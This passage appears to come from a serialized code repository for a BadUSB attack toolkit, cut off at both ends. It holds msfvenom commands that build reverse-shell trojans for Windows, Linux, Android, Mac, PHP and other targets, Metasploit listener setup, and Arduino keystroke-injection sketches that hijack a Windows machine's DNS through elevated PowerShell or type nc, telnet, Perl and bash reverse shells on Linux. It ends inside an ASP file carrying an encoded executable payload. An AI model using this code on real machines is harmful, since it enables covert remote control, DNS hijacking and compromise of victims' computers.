#Python木马:\n      msfvenom -p python/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f  raw > virus.py\n      \n      #Android木马:\n      msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -o virus.apk\n      \n      #Bash木马:\n      msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP> LPORT=<Your Port> -f raw > virus.sh\n      \n      #Linux木马：\n      msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f elf > shell.elf\n      \n      #Mac木马：\n      msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f macho > shell.macho\n      \n      #WAR木马：\n      msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f war > shell.war\n      \n      #Perl木马：\n      msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP LPORT=<Your Port> -f raw > shell.pl\n\n\n2、开启postgresql数据库：（简单攻击可省略）\n/etc/init.d/postgresql status  查看postgresql服务的状态\n/etc/init.d/postgresql start  开启postgresql服务\nnetstat -ntulp  查看端口\n\n\n3、启动msf监听，等待BadUSB插入，对方上线：\nmsfconsole  开启MSF\nmsf5>use exploit/multi/handler 选择exploits\nmsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp  设置payload，注意与上方payload相同\nshow options  查看所需设置的参数\nset lhost KaliIP (设置监听地址，注意与上方lhost相同)\nset lport <Your Port>  设置监听端口\nrun 或者exploit  运行攻击模块\n"
  },
  {
    "path": "DNSHijack/DOS_CommandSetMultipleDNS(DNSHijack).ino",
    "content": "void setup() {\n  Keyboard.begin();//开始键盘通讯 \n  delay(3000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"cmd /c netsh interface ip set dns \\\"Local Area Connection\\\" static 127.0.0.1-192.168.1.1&&netsh interface ip set dns \\\"????\\\" static 127.0.0.1-192.168.1.1\");  //DOS命令设置多个DNS\n  Keyboard.end();\n}\nvoid loop() {\n}\n"
  },
  {
    "path": "DNSHijack/PSL_CommandSetMultipleDNS(DNSHijack).ino",
    "content": "void setup(){\n  Keyboard.begin();\n  delay(3000);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.println(\"POWERSHELL.EXE -C START-PROCESS POWERSHELL -VERB RUNAS\");\n  Keyboard.println();\n  delay(1000);\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.print('y');\n  Keyboard.release(KEY_LEFT_ALT);\n  delay(500);\n  Keyboard.println(\"CMD\");\n  delay(50);\n  Keyboard.println(\"NETSH INTERFACE IP SET DNS \\\"lOCAL aREA cCONNECTION\\\" STATIC 127.0.0.1-192.168.1.1&&EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\n\nvoid loop(){\n}\n"
  },
  {
    "path": "LICENSE",
    "content": "BSD 3-Clause License\n\nCopyright (c) 2021, wwy\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n  list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n  this list of conditions and the following disclaimer in the documentation\n  and/or other materials provided with the distribution.\n\n* Neither the name of the copyright holder nor the names of its\n  contributors may be used to endorse or promote products derived from\n  this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n"
  },
  {
    "path": "Linux_Built-inReverseShell/LinuxReverseShell (CodeExecution).ino",
    "content": "\n\nvoid setup()\n{\n  delay(5000);\n  terminal();\n  delay(3000);\n  Keyboard.println(\"echo INPUT0 > /tmp/pay\");\n  delay(100);\n  Keyboard.println(\"echo INPUT1 >> /tmp/pay\");\n  delay(100);\n  Keyboard.println(\"echo INPUT2 >> /tmp/pay\");\n  delay(100);\n  Keyboard.println(\"echo INPUT3 >> /tmp/pay\");\n  delay(100);\n  Keyboard.println(\"echo INPUT4 >> /tmp/pay\");\n  delay(100);\n  Keyboard.println(\"echo INPUT5 >> /tmp/pay\");\n  delay(100);\n  Keyboard.println(\"echo INPUT6 >> /tmp/pay\");\n  delay(2000);\n  Keyboard.println(\"xxd -r -p /tmp/pay /tmp/payload\");\n  delay(2000);\n  Keyboard.println(\"chmod +x /tmp/payload\");\n  Keyboard.println(\"/tmp/payload &\");\n  delay(2000);\n  Keyboard.println(\"exit\");\n  \n}\n\nvoid loop()\n{\n   \n}\n\nvoid terminal()\n{\n  Keyboard.set_modifier(MODIFIERKEY_CTRL);\n  Keyboard.send_now();\n  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);\n  Keyboard.send_now();\n  Keyboard.set_key1(KEY_T);\n  Keyboard.send_now();\n  \n  delay(100);\n  Keyboard.set_modifier(0);\n  Keyboard.set_key1(0);\n  Keyboard.send_now(); \n\n}\n"
  },
  {
    "path": "Linux_Built-inReverseShell/LinuxReverseShell(BashShell).ino",
    "content": "\n# define PAYLOAD1 \"mknod bp1 p && nc INPUT0 INPUT1 0<bp1 | /bin/bash 1>bp1 &\"\n//# define PAYLOAD2 \"/bin/bash -i > /dev/tcp/192.168.1.40/8080 0<&1 2>&1 &\" \n#define PAYLOAD3 \"mknod bp2 p && telnet INPUT2 INPUT3 0<bp2 | /bin/bash 1>bp2 &\"\n\nvoid setup()\n{\n  delay(5000);\n  terminal();\n  delay(3000);\n  Keyboard.println(PAYLOAD1);\n  delay(2000);\n  //Keyboard.println(PAYLOAD2);\n  //delay(2000);\n  Keyboard.println(PAYLOAD3);\n  delay(2000);\n  Keyboard.println(\"exit\");\n  \n}\n\nvoid loop()\n{\n   \n}\n\nvoid terminal()\n{\n  Keyboard.set_modifier(MODIFIERKEY_CTRL);\n  Keyboard.send_now();\n  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);\n  Keyboard.send_now();\n  Keyboard.set_key1(KEY_T);\n  Keyboard.send_now();\n  \n  delay(100);\n  Keyboard.set_modifier(0);\n  Keyboard.set_key1(0);\n  Keyboard.send_now(); \n\n}\n\n"
  },
  {
    "path": "Linux_Built-inReverseShell/LinuxReverseShell(PerlShell).ino",
    "content": "\n\nvoid setup()\n{\n  delay(5000);\n  terminal();\n  delay(3000);\n  Keyboard.print(\"perl -MIO -e '$p=fork;exit,if\");\n  delay(100);\n  Keyboard.print(\"($p);$c=new IO::Socket::INET\");\n  delay(100);\n  Keyboard.print(\"(PeerAddr,\\\"INPUT0:INPUT1\\\"\");\n  delay(100);\n  Keyboard.print(\");STDIN->fdopen($c,r);$~->\");\n  delay(100);\n  Keyboard.print(\"fdopen($c,w);system$_ \");\n  delay(100);\n  Keyboard.println(\"while<>;'\");\n  delay(1000);\n  Keyboard.println(\"exit\");\n    \n}\n\nvoid loop()\n{\n   \n}\n\nvoid terminal()\n{\n  Keyboard.set_modifier(MODIFIERKEY_CTRL);\n  Keyboard.send_now();\n  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);\n  Keyboard.send_now();\n  Keyboard.set_key1(KEY_T);\n  Keyboard.send_now();\n  \n  delay(100);\n  Keyboard.set_modifier(0);\n  Keyboard.set_key1(0);\n  Keyboard.send_now(); \n\n}\n\n"
  },
  {
    "path": "MSF_Trojanlinkage/Shell_TrojanGenerationConfiguration.txt",
    "content": "\nIP192.168.43.242\nport4444\n\n\nexeľ\nmsfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP> lport=<Your Port> -f exe -o shell.exe -e x86/shikata_ga_nai -i 8\n\njspľ\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.jsp\n\n#Powershellľ:\nmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f psh-reflection > shell.psl\n\n#JAVAľ:\nmsfvenom -p java/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f jar -o shell.jar\n\n#PHPľ:\nmsfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw -o shell.php\n\n#ASPľ:\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f asp > shell.asp\n\n#ASPXľ:\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f aspx > shell.aspx\n\n#Pythonľ:\nmsfvenom -p python/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f  raw > shell.py\n\n#Androidľ:\nmsfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -o shell.apk\n\n#Bashľ:\nmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.sh\n\n#Linuxľ\nmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f elf > shell.elf\n\n#Macľ\nmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f macho > shell.macho\n\n#WARľ\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f war > shell.war\n\n#Perlľ\nmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP LPORT=<Your Port> -f raw > shell.pl\n"
  },
  {
    "path": "MSF_Trojanlinkage/shell.asp",
    "content": "<% @language=\"VBScript\" %>\n<% \n\tSub gJjCrDeBtLBn()\n\t\twvWPLP=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(128)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101)\nwvWPLP=wvWPLP&Chr(32)&Chr(114)&Chr(117)&Chr(110)&Chr(32)&Chr(105)&Chr(110)&Chr(32)&Chr(68)&Chr(79)&Chr(83)&Chr(32)&Chr(109)&Chr(111)&Chr(100)&Chr(101)&Chr(46)&Chr(13)&Chr(13)&Chr(10)&Chr(36)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(80)&Chr(69)&Chr(0)&Chr(0)&Chr(76)&Chr(1)&Chr(3)&Chr(0)&Chr(97)&Chr(144)&Chr(140)&Chr(129)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(224)&Chr(0)&Chr(15)&Chr(3)&Chr(11)&Chr(1)&Chr(2)&Chr(56)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(1)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(70)&Chr(58)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(100)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(46)&Chr(116)&Chr(101)&Chr(120)&Chr(116)&Chr(0)&Chr(0)&Chr(0)&Chr(40)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(48)&Chr(96)&Chr(46)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(0)&Chr(144)&Chr(10)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(0)&Chr(12)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(48)&Chr(224)&Chr(46)&Chr(105)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(100)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(48)&Chr(192)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(32)&Chr(64)&Chr(0)&Chr(255)&Chr(224)&Chr(144)&Chr(255)&Chr(37)&Chr(56)&Chr(48)&Chr(64)&Chr(0)&Chr(144)&Chr(144)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(190)&Chr(101)&Chr(81)&Chr(244)&Chr(228)&Chr(221)&Chr(199)&Chr(217)&Chr(116)&Chr(36)&Chr(244)&Chr(95)&Chr(49)&Chr(201)&Chr(102)&Chr(185)&Chr(4)&Chr(2)&Chr(49)&Chr(119)&Chr(21)&Chr(3)&Chr(119)&Chr(21)&Chr(131)&Chr(199)&Chr(97)&Chr(179)&Chr(1)&Chr(213)&Chr(169)&Chr(91)&Chr(226)&Chr(6)&Chr(105)&Chr(156)&Chr(150)&Chr(217)&Chr(89)&Chr(248)&Chr(223)&Chr(6)&Chr(101)&Chr(232)&Chr(98)&Chr(70)&Chr(149)&Chr(233)&Chr(2)&Chr(206)&Chr(112)&Chr(216)&Chr(2)&Chr(180)&Chr(241)&Chr(75)&Chr(179)&Chr(190)&Chr(87)&Chr(96)&Chr(56)&Chr(146)&Chr(67)&Chr(243)&Chr(76)&Chr(59)&Chr(100)&Chr(180)&Chr(251)&Chr(29)&Chr(75)&Chr(69)&Chr(87)&Chr(93)&Chr(202)&Chr(197)\nwvWPLP=wvWPLP&Chr(170)&Chr(178)&Chr(44)&Chr(247)&Chr(100)&Chr(199)&Chr(45)&Chr(48)&Chr(152)&Chr(42)&Chr(127)&Chr(233)&Chr(214)&Chr(153)&Chr(111)&Chr(158)&Chr(163)&Chr(33)&Chr(4)&Chr(236)&Chr(34)&Chr(34)&Chr(249)&Chr(165)&Chr(69)&Chr(3)&Chr(172)&Chr(190)&Chr(31)&Chr(131)&Chr(79)&Chr(18)&Chr(20)&Chr(138)&Chr(87)&Chr(119)&Chr(17)&Chr(68)&Chr(236)&Chr(67)&Chr(237)&Chr(87)&Chr(36)&Chr(154)&Chr(14)&Chr(251)&Chr(9)&Chr(18)&Chr(253)&Chr(5)&Chr(78)&Chr(149)&Chr(30)&Chr(112)&Chr(166)&Chr(229)&Chr(163)&Chr(131)&Chr(125)&Chr(151)&Chr(127)&Chr(1)&Chr(101)&Chr(63)&Chr(11)&Chr(177)&Chr(65)&Chr(193)&Chr(216)&Chr(36)&Chr(2)&Chr(205)&Chr(149)&Chr(35)&Chr(76)&Chr(210)&Chr(40)&Chr(231)&Chr(231)&Chr(238)&Chr(161)&Chr(6)&Chr(39)&Chr(103)&Chr(241)&Chr(44)&Chr(227)&Chr(35)&Chr(161)&Chr(77)&Chr(178)&Chr(137)&Chr(4)&Chr(113)&Chr(164)&Chr(113)&Chr(248)&Chr(215)&Chr(175)&Chr(156)\nwvWPLP=wvWPLP&Chr(237)&Chr(101)&Chr(242)&Chr(200)&Chr(194)&Chr(71)&Chr(12)&Chr(9)&Chr(77)&Chr(223)&Chr(127)&Chr(59)&Chr(210)&Chr(75)&Chr(23)&Chr(119)&Chr(155)&Chr(85)&Chr(224)&Chr(14)&Chr(139)&Chr(101)&Chr(62)&Chr(168)&Chr(220)&Chr(155)&Chr(190)&Chr(201)&Chr(245)&Chr(95)&Chr(234)&Chr(153)&Chr(109)&Chr(73)&Chr(146)&Chr(113)&Chr(110)&Chr(118)&Chr(71)&Chr(239)&Chr(100)&Chr(224)&Chr(167)&Chr(88)&Chr(83)&Chr(2)&Chr(79)&Chr(155)&Chr(164)&Chr(243)&Chr(211)&Chr(18)&Chr(66)&Chr(163)&Chr(187)&Chr(116)&Chr(219)&Chr(4)&Chr(107)&Chr(53)&Chr(139)&Chr(236)&Chr(97)&Chr(186)&Chr(244)&Chr(13)&Chr(138)&Chr(16)&Chr(157)&Chr(164)&Chr(100)&Chr(205)&Chr(245)&Chr(80)&Chr(29)&Chr(84)&Chr(141)&Chr(193)&Chr(226)&Chr(66)&Chr(235)&Chr(194)&Chr(104)&Chr(103)&Chr(11)&Chr(140)&Chr(152)&Chr(2)&Chr(31)&Chr(249)&Chr(255)&Chr(236)&Chr(223)&Chr(250)&Chr(149)&Chr(236)&Chr(181)&Chr(254)&Chr(63)&Chr(186)\nwvWPLP=wvWPLP&Chr(33)&Chr(253)&Chr(102)&Chr(140)&Chr(237)&Chr(254)&Chr(77)&Chr(142)&Chr(234)&Chr(1)&Chr(19)&Chr(167)&Chr(129)&Chr(52)&Chr(129)&Chr(135)&Chr(253)&Chr(56)&Chr(69)&Chr(8)&Chr(254)&Ch